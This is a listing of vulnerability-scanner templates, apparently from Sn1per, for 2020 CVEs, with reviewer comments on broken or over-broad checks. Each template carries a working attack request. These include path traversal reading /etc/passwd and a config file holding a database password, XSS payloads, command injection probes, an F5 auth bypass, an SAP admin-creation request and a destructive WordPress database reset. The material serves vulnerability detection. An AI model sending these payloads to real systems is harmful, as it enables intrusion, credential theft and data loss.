# NOTE(review): the "......%252f" run inside URI does not follow the "..%252f" pattern
# used everywhere else and looks like a transcription error; as written the traversal
# depth is probably wrong and the check may never fire. Verify against the sibling
# traversal templates before trusting a negative result.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-17519 - Apache Flink Path Traversal'
URI="/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2034_-_PAN-OS_GlobalProtect_OS_Command_Injection.sh:
--------------------------------------------------------------------------------
# NOTE(review): MATCH names response headers, but CURL_OPTS has neither -I nor -i, so
# only the body is grepped and this cannot match as written. Even with headers
# included, ETag/Last-Modified appear on most servers and carry no version, so a hit
# would flag every GlobalProtect portal as P1. GREP_OPTIONS='' also makes this the only
# case-sensitive match among the templates shown here.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection'
URI='/global-protect/login.esp'
METHOD='GET'
MATCH='ETag|Last-Modified'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS=''
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh:
--------------------------------------------------------------------------------
# NOTE(review): MATCH is empty. If the runner greps for an empty pattern, every
# response matches and any host serving this path is reported as vulnerable; if the
# runner special-cases an empty MATCH (e.g. looks for the reflected payload), that
# logic is not visible here — confirm before trusting these XSS findings.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 - Jenkins Gitlab Hook XSS'
URI="/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH=""
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh:
--------------------------------------------------------------------------------
# Same payload as the Gitlab Hook template above, on the /git/ path variant.
# Empty MATCH: see the note on the Gitlab Hook template above.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1'
URI="/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH=""
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh:
--------------------------------------------------------------------------------
# Variant for Jenkins mounted under /jenkins/. Empty MATCH: see the note above.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2'
URI="/jenkins/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH=""
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh:
--------------------------------------------------------------------------------
# /gitlab/ path variant. Empty MATCH: see the note above. (Template continues on the
# next listing line.)
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3'
URI="/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH=""
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh:
--------------------------------------------------------------------------------
# NOTE(review): MATCH is empty. If the runner greps for an empty pattern, every
# response matches and any host serving this path is reported as vulnerable; if the
# runner special-cases an empty MATCH (e.g. looks for the reflected payload), that
# logic is not visible here — confirm before trusting these XSS findings.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4'
URI="/jenkins/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH=""
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh:
--------------------------------------------------------------------------------
# Reflected-XSS probe against the plugin's regexCheck validator. Empty MATCH: see the
# note on the Gitlab XSS 4 template above.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2140 - Jenkin AuditTrailPlugin XSS'
URI="/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH=""
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s --insecure -L "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh:
--------------------------------------------------------------------------------
# Reflected-XSS probe via the theme parameter. Empty MATCH: see the note above.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-24223 - Mara CMS 7.5 Reflective XSS'
URI='/contact.php?theme=%3Csvg/onload=alert(1337)%3E'
METHOD='GET'
MATCH=""
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-25213_-_WP_File_Manager_File_Upload.sh:
--------------------------------------------------------------------------------
# Version check against the plugin readme (template continues on the next listing line).
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-25213 - WP File Manager File Upload'
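# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
# Tail of the WP File Manager template (header on the previous listing line).
URI="/wp-content/plugins/wp-file-manager/readme.txt"
METHOD='GET'
# Version inference from the readme "Stable tag" line: the pattern admits 0.0 – 6.8.
# Note it is a substring match, so a longer minor such as "6.10" is also accepted by
# its "6.1" prefix.
MATCH="(Stable\stag\:\s[0-6]\.[0-8])"
SEVERITY='P1 - CRITICAL'
# -I removed: it makes curl send HEAD, so readme.txt's body — where "Stable tag" lives —
# was never fetched and the check could not fire. Now consistent with the Contact Form 7
# readme templates, which fetch the body without -I.
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2551_-_Unauthenticated_Oracle_WebLogic_Server_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
# Version fingerprint from the console login page: a hit means one of the listed
# version strings is displayed, not that the vulnerability itself was exercised.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution'
URI='/console/login/LoginForm.jsp'
METHOD='GET'
MATCH="10\.3\.6\.0|12\.1\.3\.0|12\.2\.1\.3|12\.2\.1\.4"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh:
--------------------------------------------------------------------------------
# NOTE(review): MATCH is just "WebLogic", so every WebLogic console login page reports
# as P1 regardless of patch level. Treat a hit as a product fingerprint; the CVE-2020-2551
# template above at least narrows on version strings.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2555 - WebLogic Server Deserialization RCE'
URI="/console/login/LoginForm.jsp"
METHOD='GET'
MATCH="WebLogic"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh:
--------------------------------------------------------------------------------
# Header-only request (-I) looking for "webvpn" in the response headers (presumably a
# cookie name — confirm). A hit identifies a Cisco WebVPN endpoint; it does not
# exercise the file-deletion bug, so verify before reporting as P1.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-3187 - Citrix Unauthenticated File Deletion'
URI="/+CSCOE+/session_password.html"
METHOD='GET'
MATCH="webvpn"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'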
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
/templates/active/CVE-2020-3452_-_Cisco_ASA-FTD_Arbitrary_File_Reading_Vulnerability.sh:
--------------------------------------------------------------------------------
# Exploit-confirming read: the translation-table request pulls portal_inc.lua through
# the traversal and MATCH looks for identifiers from that file, so a hit means the
# file contents were returned.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability'
URI='/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
METHOD='GET'
MATCH="INTERNAL_PASSWORD_ENABLED|CONF_VIRTUAL_KEYBOARD"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh:
--------------------------------------------------------------------------------
# A hit means the server-side pages manifest was served from under /_next/static;
# MATCH anchors on the "/_app" entry so an ordinary 404/HTML page does not match.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal'
URI="/_next/static/../server/pages-manifest.json"
METHOD='GET'
MATCH='\{\"/_app\":\".*?_app\.js\"'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_1.sh:
--------------------------------------------------------------------------------
# Double-encoded traversal to /etc/passwd. MATCH is shared with the _2/_3 siblings
# (resolv.conf / win.ini), so only the root:*: alternative can hit here; harmless but
# worth knowing when reading results.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 1'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_2.sh:
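# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
# Second Spring traversal probe: same path depth as _1, reads resolv.conf (the
# "nameserver" alternative in MATCH is the one that can hit here).
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/resolv.conf"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_3.sh:
--------------------------------------------------------------------------------
# Windows variant (win.ini; the "[extensions]" alternative in MATCH).
AUTHOR='@xer0dayz'
# Fixed: this file previously carried the _2 template's name ("... Traversal 2"), so
# hits from _2 and _3 were indistinguishable in the report.
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 3'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../Windows/win.ini"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5412_-_Full-read_SSRF_in_Spring_Cloud_Netflix.sh:
--------------------------------------------------------------------------------
# SSRF check with an external dependency: a hit requires the target to reach
# burpcollaborator.net and proxy that host's banner back. A positive therefore also
# means the target made an outbound request to a third party; a negative may just be
# egress filtering.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix'
URI="/proxy.stream?origin=http://burpcollaborator.net/"
METHOD='GET'
MATCH="Burp\ Collaborator\ Server"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_1.sh:
--------------------------------------------------------------------------------
# TMUI auth-bypass probe (the "..;" path trick); a hit means the authproperties page
# rendered without login. This only proves the bypass, not command execution.
AUTHOR='@xer0dayz'
# Re-joined: the listing had wrapped this literal across a line break.
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 1'
URI='/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp'
METHOD='GET'
MATCH='divGeneralRemoteSettingsTable'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_2.sh:
--------------------------------------------------------------------------------
# Same bypass, used to read /etc/passwd through fileRead.jsp — exploit-confirming file read.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2'
URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh:
--------------------------------------------------------------------------------
# NOTE(review): SEVERITY is P1 - CRITICAL for a reflected XSS, while the other XSS
# templates use P2/P3; it was presumably copied from the RCE siblings. MATCH is also
# empty (see the Jenkins XSS templates for the empty-MATCH caveat).
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS'
URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E'
METHOD='GET'
MATCH=""
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-6287_-_Create_an_Administrative_User_in_SAP_NetWeaver_AS_JAVA.sh:
--------------------------------------------------------------------------------
# State-changing by design: the CVE is "create an administrative user", so a request
# that succeeds leaves an account on the target. NOTE(review): the --data value does
# not look like a complete SOAP body, and the {{base64('data')}} fragment looks like a
# helper placeholder from another template language that this runner does not expand
# (its inner quotes also break the single-quoted --data argument when word-split).
# MATCH "CTCWebServiceSi" can be satisfied by an error page from the endpoint, so treat
# a hit as endpoint exposure rather than proof of user creation.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-6287 - Create an Administrative User in SAP NetWeaver AS JAVA'
URI="/CTCWebService/CTCWebServiceBean/ConfigServlet"
METHOD='POST'
MATCH="CTCWebServiceSi"
SEVERITY='P1 - CRITICAL'
# Re-joined: the listing had wrapped this literal across a line break.
CURL_OPTS="--user-agent '' -L -s --insecure -H 'Content-Type: text/xml; charset=UTF-8' --data 'sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc{{base64('data')}}userDetails'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-7048_-_WP_Database_Reset_3.15_Unauthenticated_Database_Reset.sh:
--------------------------------------------------------------------------------
# Destructive check, not a fingerprint: on a vulnerable site this request triggers a
# reset of the comments table (db-reset-tables[]=comments with a guessed confirmation
# code). -I turns it into a HEAD request, which admin-post.php may or may not process;
# either way this template should only run under explicit opt-in, and the runner's
# redirect-header match (X-Redirect-By) is the only evidence it collects.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset'
URI='/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111'
METHOD='GET'
MATCH='X-Redirect-By\:\ WordPress'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -I"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-7209_-_LinuxKI_Toolset_6.01_Remote_Command_Execution.sh:
--------------------------------------------------------------------------------
# Exploit-confirming: the pid parameter chains an echo|base64 -d whose decoded output
# is the literal "nonexistent"; MATCH on that string means the command ran.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7209 - LinuxKI Toolset 6.01 Remote Command Execution'
URI="/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
METHOD='GET'
MATCH='nonexistent'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
# Version banner check on / (template continues on the next listing line).
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7246 - qdPM Authenticated Remote Code Execution'
URI="/"
METHOD='GET'
MATCH='qdPM 9.'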
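# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
# Tail of the qdPM template: MATCH 'qdPM 9.' (previous listing line) is a version
# banner and the CVE needs authentication, so a hit is a fingerprint reported at P1.
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled:
--------------------------------------------------------------------------------
# Disabled template (.disabled suffix). Header-only request; MATCH expects a
# zero-length reply to /UploadTest.aspx, presumably the unauthenticated-endpoint signal.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7473 Citrix ShareFile StorageZones Unauthenticated Access'
URI="/UploadTest.aspx"
METHOD='GET'
MATCH="content\-length\:\ 0"
SEVERITY='P2 - HIGH'
# Fixed quoting: the original CURL_OPTS='-L -I --user-agent '' -s --insecure' is
# single-quoted, so the '' pair closes and reopens the string and --user-agent would
# consume -s as its value. Double-quoted now, like the sibling templates.
CURL_OPTS="-L -I --user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.py:
--------------------------------------------------------------------------------
# Import any WebDriver class that you would usually import from
# selenium.webdriver from the seleniumrequests module
# (seleniumrequests and a Firefox/geckodriver install are required; neither is stdlib.)
import sys
from seleniumrequests import Firefox

# The base URL is the only argument; fail with a usage line instead of an IndexError
# traceback when it is missing.
if len(sys.argv) != 2:
    sys.exit("usage: %s <base-url>" % sys.argv[0])
url = sys.argv[1]

# Simple usage with built-in WebDrivers:
webdriver = Firefox()
try:
    response = webdriver.request('GET', '%s/www/delivery/afr.php?refresh=10000&")\',10000000);document.write(1+1336);setTimeout(\'alert("' % url)
    # NOTE(review): the probe writes 1+1336 into the page, but .request() returns the
    # raw HTTP body, not a rendered DOM, so "1337" only appears if the target reflects
    # an already-evaluated value. Confirm this is the intended oracle; a plain
    # reflection of the payload would not contain "1337".
    if '1337' in response.text:
        print("Vulnerable!")
finally:
    # Always close the browser, even when the request raises; the original leaked the
    # Firefox process on any exception.
    webdriver.quit()
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.sh:
--------------------------------------------------------------------------------
# curl variant of the same check: looks for the injected script reflected verbatim in
# the afr.php response.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8115 - Revive Adserver XSS'
URI="/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
METHOD='GET'
# Fixed: MATCH now looks for alert(1337), the value the URI actually injects; the
# original pattern looked for alert(1) and so could never match the reflected payload.
# The trailing &loc=' assumes the application appends its own parameter after the
# reflection — confirm against a real response.
MATCH="\);alert\(1337\);setTimeout\('alert\(\"&loc='"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'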
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8163_-_Rails_5.0.1_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
# Exploit-confirming: the query asks the target shell to evaluate $((1+1787568)) and
# MATCH checks for 1787569, so a hit means code ran on the host (the payload is an
# arithmetic echo, nothing is read or written).
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8163 - Rails < 5.0.1 Remote Code Execution'
URI='/?system(%27echo+$((1%2B1787568))%27)%3ba%23'
METHOD='GET'
MATCH="1787569"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8191_-_Citrix_ADC_NetScaler_Gateway_Reflected_XSS.sh:
--------------------------------------------------------------------------------
# NOTE(review): the -H list is mis-quoted — "-H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6'"
# closes the X-Requested-With value early and leaves X-NITRO-USER without its own -H
# (compare the CVE-2020-8193 template below, which passes each header separately), so
# the request on the wire is not what the author intended. SEVERITY 'P1 - HIGH' also
# mixes the P1 tier with the HIGH label that the other templates pair with P2. MATCH is
# empty (see the Jenkins XSS templates for the empty-MATCH caveat).
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8191 - Citrix ADC & NetScaler Gateway Reflected XSS'
URI="/menu/stapp"
METHOD='POST'
MATCH=""
SEVERITY='P1 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh:
--------------------------------------------------------------------------------
# Looks for a SESSID in the reply to the unauthenticated pcidss report request.
# NOTE(review): -I together with --data and METHOD='POST' is contradictory for curl
# (-I asks for a HEAD-style request); which method actually goes out depends on how the
# runner appends METHOD — verify on the wire. (Template continues on the next listing
# line.)
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI'
URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
METHOD='POST'
MATCH="SESSID"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data ''"
SECONDARY_COMMANDS=''
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8194_-_Citrix_ADC_NetScaler_Gateway_Reflected_Code_Injection.sh:
--------------------------------------------------------------------------------
# Reflection probe with a marker value (nonexistent.1337). NOTE(review): MATCH is
# empty, so unless the runner special-cases it every response counts as a hit — the
# marker in URI would be the natural thing to match on.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection'
URI="/menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo"
METHOD='GET'
MATCH=""
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh:
--------------------------------------------------------------------------------
# Traversal read of /etc/passwd via the help download servlet — exploit-confirming.
# The same path is probed again by the "XenMobile-Citrix Endpoint Management Path
# Traversal" template (next listing line), so a vulnerable host is reported twice.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal'
URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Config_Password_Disclosure.sh:
--------------------------------------------------------------------------------
# Same traversal aimed at sftu.properties; a hit means a config file containing a
# database password was returned. The response presumably lands in the scanner's loot
# directory — handle that output as credential material.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure'
URI='/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties'
METHOD='GET'
MATCH="database\.password"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Path_Traversal.sh:
--------------------------------------------------------------------------------
# Duplicate of the "Citrix XenMobile Server Path Traversal" template (previous listing
# line): same URI and MATCH, only the quoting style and VULN_NAME differ, so each
# vulnerable host costs two requests and two findings.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal'
URI='/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8512_-_IceWarp_WebMail_XSS.sh:
--------------------------------------------------------------------------------
# Reflected-XSS probe via the color parameter. MATCH is empty — see the Jenkins XSS
# templates for the empty-MATCH caveat.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8512 - IceWarp WebMail XSS'
URI="/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"
METHOD='GET'
MATCH=""
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8772_-_IfiniteWP_Client_1.9.4.5_Authentication_Bypass_1.sh:
--------------------------------------------------------------------------------
